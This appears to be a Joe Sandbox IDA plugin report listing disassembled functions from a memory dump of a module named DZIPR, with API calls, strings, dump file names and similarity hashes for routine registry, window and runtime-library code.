Function 6FE2A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6FE2A08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FE2A11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FE2A13D

Part of subcall function 6FE2A02D: __EH_prolog3.LIBCMT ref: 6FE2A034

Strings

Software\Classes\, xrefs: 6FE2A0CD

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: c1151283ab5027f21346480229af26de35f33170ed29c627a8472a8e85e1a23d
Instruction ID: 3c662aed452db0936f1f7f08e4164f5b4e89c9521405ecdeaea4a20e6645f809
Opcode Fuzzy Hash: c1151283ab5027f21346480229af26de35f33170ed29c627a8472a8e85e1a23d
Instruction Fuzzy Hash: 22319571C44228AADB21ABE4DC48BDDBFB5AF09324F2402DAE85567290E7745F84DF50

Function 6FE2D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FE2D0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FE2D0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FE2D0ED
RegCloseKey.ADVAPI32(?), ref: 6FE2D0FD
RegCloseKey.ADVAPI32(?), ref: 6FE2D107

Strings

software, xrefs: 6FE2D096

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 6d011b16b8e85efc74b1fc8470a0d9d688f86aeb31f036814c4e069ecec35e2d
Instruction ID: 97c564a4e824c944b2e87e3678eb3b2e5e8a8177de97d236f80475ca3365ebe4
Opcode Fuzzy Hash: 6d011b16b8e85efc74b1fc8470a0d9d688f86aeb31f036814c4e069ecec35e2d
Instruction Fuzzy Hash: 35111C76D00118BB8B21DB86CD44CDFBFBEEF86714F10006AA604A2111E6319A05DBA0

Function 6FE2BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 6FE2BEB5
__CxxThrowException@8.LIBCMT ref: 6FE2BEBF

Part of subcall function 6FE3527B: RaiseException.KERNEL32(?,00000003,000000FF,6FE2279F), ref: 6FE352BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?), ref: 6FE2BED6
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BEE3

Part of subcall function 6FE26D89: __CxxThrowException@8.LIBCMT ref: 6FE26D9F

_memset.LIBCMT ref: 6FE2BF02
TlsSetValue.KERNEL32(?,00000000,?), ref: 6FE2BF13
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BF34

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 4c7a056a688ee80b133acd18a0e631adbefa3eac5db3c01d7c5175a2dda703cc
Instruction ID: 41e708d0082c2257f20b30ef919efa078d5789becd68986080f645a41b898732
Opcode Fuzzy Hash: 4c7a056a688ee80b133acd18a0e631adbefa3eac5db3c01d7c5175a2dda703cc
Instruction Fuzzy Hash: D6118E70500605AFEB10AF64CC89C2ABFB5FF42324B20C52EE65596660DB31AD65CF90

Function 6FE3FE0E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FE3FE1A

Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F

__amsg_exit.LIBCMT ref: 6FE3FE3A
__lock.LIBCMT ref: 6FE3FE4A
InterlockedDecrement.KERNEL32(?), ref: 6FE3FE67
InterlockedIncrement.KERNEL32(00D828E8), ref: 6FE3FE92

Strings

$o, xrefs: 6FE3FE71

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: $o
API String ID: 4271482742-1314351406
Opcode ID: 524d4f106e0240d39e50ce66b38f8351d50b9dc8479c5fc95ef767cc82560f87
Instruction ID: 2409da49df9916ab6e56581144cf4dfa72a6dbfc2019cca9af6e50781ff3b21b
Opcode Fuzzy Hash: 524d4f106e0240d39e50ce66b38f8351d50b9dc8479c5fc95ef767cc82560f87
Instruction Fuzzy Hash: C1015E33D01B719BDB19ABA6880875E7FA0AF86B39F21010ED41067391C739A991CBD5

Function 6FE2CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6FE2CA85
SetErrorMode.KERNEL32(00000000), ref: 6FE2CA8D

Part of subcall function 6FE2A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FE2A6D0
Part of subcall function 6FE2A698: SetLastError.KERNEL32(0000006F), ref: 6FE2A6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6FE2CADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FE2CAEC

Part of subcall function 6FE2C8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FE2C91F
Part of subcall function 6FE2C8E2: PathFindExtensionW.SHLWAPI(?), ref: 6FE2C939
Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2C983
Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2C9C2
Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2CA14

Strings

NotifyWinEvent, xrefs: 6FE2CAE6
user32.dll, xrefs: 6FE2CAD7

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
String ID: NotifyWinEvent$user32.dll
API String ID: 3531328582-597752486
Opcode ID: 87a7e292225ec6c9ca20ba03bc5de54c4be1d21ef61276d2af9535b33f5377f6
Instruction ID: b79003b13b83f46ece1791ce7b137252663710221a5478d75ec38ba69c61e95d
Opcode Fuzzy Hash: 87a7e292225ec6c9ca20ba03bc5de54c4be1d21ef61276d2af9535b33f5377f6
Instruction Fuzzy Hash: 4C01BC706542044FCB14EF68D804A4A3FE8AF45724F21805FB945DB381EB30E841CFA2

Function 6FE2CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6FE2CD2E
GetSysColor.USER32(00000010), ref: 6FE2CD35
GetSysColor.USER32(00000014), ref: 6FE2CD3C
GetSysColor.USER32(00000012), ref: 6FE2CD43
GetSysColor.USER32(00000006), ref: 6FE2CD4A
GetSysColorBrush.USER32(0000000F), ref: 6FE2CD57
GetSysColorBrush.USER32(00000006), ref: 6FE2CD5E

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 0bb30676f329f156152756d8bbcd7805bd2c318747b0496f59fe8bd86a91869a
Instruction ID: 53dc158d02ae4717af5d50f84b564a25ea61bbfaf3788d3e92c40c9b044b0dcd
Opcode Fuzzy Hash: 0bb30676f329f156152756d8bbcd7805bd2c318747b0496f59fe8bd86a91869a
Instruction Fuzzy Hash: DAF0FE719407445BDB30BB724909B47BED1FFC5B20F16092EE2858B990D6B6E441DF40

Function 6FE2815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6FE2818D
GetParent.USER32(?), ref: 6FE2819B
GetParent.USER32(?), ref: 6FE281AE
GetLastActivePopup.USER32(?), ref: 6FE281BF
IsWindowEnabled.USER32(?), ref: 6FE281D3
EnableWindow.USER32(?,00000000), ref: 6FE281E6

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: cb21a1c2fb3783379ec47f4122c53add17bf2731661fc6694d1f65c470abd49d
Instruction ID: 6a0f09279c6bb77495b147a421c29d23d7ac44e77cdfe937a3c0af6582dfe57a
Opcode Fuzzy Hash: cb21a1c2fb3783379ec47f4122c53add17bf2731661fc6694d1f65c470abd49d
Instruction Fuzzy Hash: 7811A73260DA356BE71117698D40B5A7FE86F46B68F250257ED14EB3C0F760EB02C6D1

Function 6FE3C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6FE3C43E

Part of subcall function 6FE34FC4: __getptd.LIBCMT ref: 6FE34FD2
Part of subcall function 6FE34FC4: __getptd.LIBCMT ref: 6FE34FE0

__getptd.LIBCMT ref: 6FE3C448

Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F

__getptd.LIBCMT ref: 6FE3C456
__getptd.LIBCMT ref: 6FE3C464
__getptd.LIBCMT ref: 6FE3C46F
_CallCatchBlock2.LIBCMT ref: 6FE3C495

Part of subcall function 6FE35069: __CallSettingFrame@12.LIBCMT ref: 6FE350B5

Part of subcall function 6FE3C53C: __getptd.LIBCMT ref: 6FE3C54B
Part of subcall function 6FE3C53C: __getptd.LIBCMT ref: 6FE3C559

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 214f10ebbb662a94d3f06e9a9affa84bf66a9fcef99dbac364dd7db0ce494acb
Instruction ID: a78e4cb23ada3ae2071c82371f5b7a24afd180aa57bd9696fcc15e1961d0046e
Opcode Fuzzy Hash: 214f10ebbb662a94d3f06e9a9affa84bf66a9fcef99dbac364dd7db0ce494acb
Instruction Fuzzy Hash: D311F672D00319EFDF00DFA4C448AADBBB1FF04314F208169E814A7291EB3A9A51DF50

Function 6FE2DB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6FE2DB6D
GetDlgCtrlID.USER32(00000000), ref: 6FE2DB81
GetWindowLongW.USER32(00000000,000000F0), ref: 6FE2DB91
GetWindowRect.USER32(00000000,?), ref: 6FE2DBA3
PtInRect.USER32(?,?,?), ref: 6FE2DBB3
GetWindow.USER32(?,00000005), ref: 6FE2DBC0

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 8619fbb88417f82934e91094e47f08fe8b8823a6010b3017bd1b647afa482459
Instruction ID: 8969288237acae66efaa27d1342c615c921bf3a34650007bebbc26a9ca6db324
Opcode Fuzzy Hash: 8619fbb88417f82934e91094e47f08fe8b8823a6010b3017bd1b647afa482459
Instruction Fuzzy Hash: 22018F3A104419ABCF216F558C18E9E3FA9EF43764F144125FA11D6180E734E62A8BD4

Function 6FE32932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FE32962

Strings

AfxMDIFrame90su, xrefs: 6FE32A03
@, xrefs: 6FE32A6E
AfxFrameOrView90su, xrefs: 6FE32A28
@, xrefs: 6FE32B07

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: b22baa11d1baaddb11bcd483f8a43cd921fe9c570d4a0d5d42863ef5b9bb4401
Instruction ID: d80e53dc610d74652193aebbd70cfac1d80ff2712bddf50a9cb853cffbd7a9bb
Opcode Fuzzy Hash: b22baa11d1baaddb11bcd483f8a43cd921fe9c570d4a0d5d42863ef5b9bb4401
Instruction Fuzzy Hash: 2F910373D0032DAEDB41CF94C589BDEBFF8AF54348F20816AE958E6284E7749644C7A1

Function 6FE296DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6FE296F2
_memset.LIBCMT ref: 6FE2976A
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FE297CD
LoadBitmapW.USER32(00000000,00007FE3), ref: 6FE297E5

Strings

, xrefs: 6FE2974B

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: f5ceaa8257ac40727118d018aa1bbd39cdc9a8badd21a573b84328a16fd0014b
Instruction ID: 3a2c3df427f564e42f1617bc1eb7a6c543b071e9dee7c0471790753ab3dad039
Opcode Fuzzy Hash: f5ceaa8257ac40727118d018aa1bbd39cdc9a8badd21a573b84328a16fd0014b
Instruction Fuzzy Hash: 90312472A002259BEF108F688CC4B9D7FB5FB45354F6440AAE549DB2C0EB31AA899B50

Function 6FE3140F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6FE2C220: EnterCriticalSection.KERNEL32(6FE534A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C25A
Part of subcall function 6FE2C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C26C
Part of subcall function 6FE2C220: LeaveCriticalSection.KERNEL32(6FE534A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C279
Part of subcall function 6FE2C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C289

Part of subcall function 6FE2BB0C: __EH_prolog3_catch.LIBCMT ref: 6FE2BB13

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FE31458
FreeLibrary.KERNEL32(?), ref: 6FE31468

Strings

HtmlHelpW, xrefs: 6FE31452
hhctrl.ocx, xrefs: 6FE3143C
(Qo, xrefs: 6FE31421

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: (Qo$HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3778432635
Opcode ID: 0983bcba473a7f4146a105b0af2b5681e0b0204173bb40a1b9910624c78b6779
Instruction ID: c6c651039ae4586bbcab734c18f26a278622b2c5c0fe2bd00056bb5276b1aab9
Opcode Fuzzy Hash: 0983bcba473a7f4146a105b0af2b5681e0b0204173bb40a1b9910624c78b6779
Instruction Fuzzy Hash: FF01A232D04B26A7CB115FA5DD08B4A3FE0AF05369F20C91DF59A95290DB75E420DB51

Function 6FE3C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FE3C17F

Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F

__getptd.LIBCMT ref: 6FE3C190
__getptd.LIBCMT ref: 6FE3C19E

Strings

MOC, xrefs: 6FE3C171
csm, xrefs: 6FE3C178

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
Instruction ID: 1e567c53ec422f74caa7e61e089d25f3b1fea91c5d4900ca5e9ebfdfaff0f7e4
Opcode Fuzzy Hash: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
Instruction Fuzzy Hash: DDE0123BA542648FDB009678C0497583AE4AB95718F750196D418CB352D726E590EA42

Function 6FE25670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6FE249D6,?,00000003), ref: 6FE25685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FE256B4
GetLastError.KERNEL32 ref: 6FE256C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FE256E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FE25709

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 918722e846abf0333703a6ff3306fbe9c949ab61d0862ee4b170dd014ec65f5a
Instruction ID: 8706b7739b33c2fbe86b69bde48ba8c0d6f2c92e84740e9ce2101040896bad49
Opcode Fuzzy Hash: 918722e846abf0333703a6ff3306fbe9c949ab61d0862ee4b170dd014ec65f5a
Instruction Fuzzy Hash: 4F117F75384705ABE620AE68DDC5F677BECEB85754F20092DF681972C0E6A0BC098664

Function 6FE2DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6FE2DA3D
_memset.LIBCMT ref: 6FE2DA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6FE2DA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6FE2DA87
SetWindowTextW.USER32(00000000,?), ref: 6FE2DA93

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
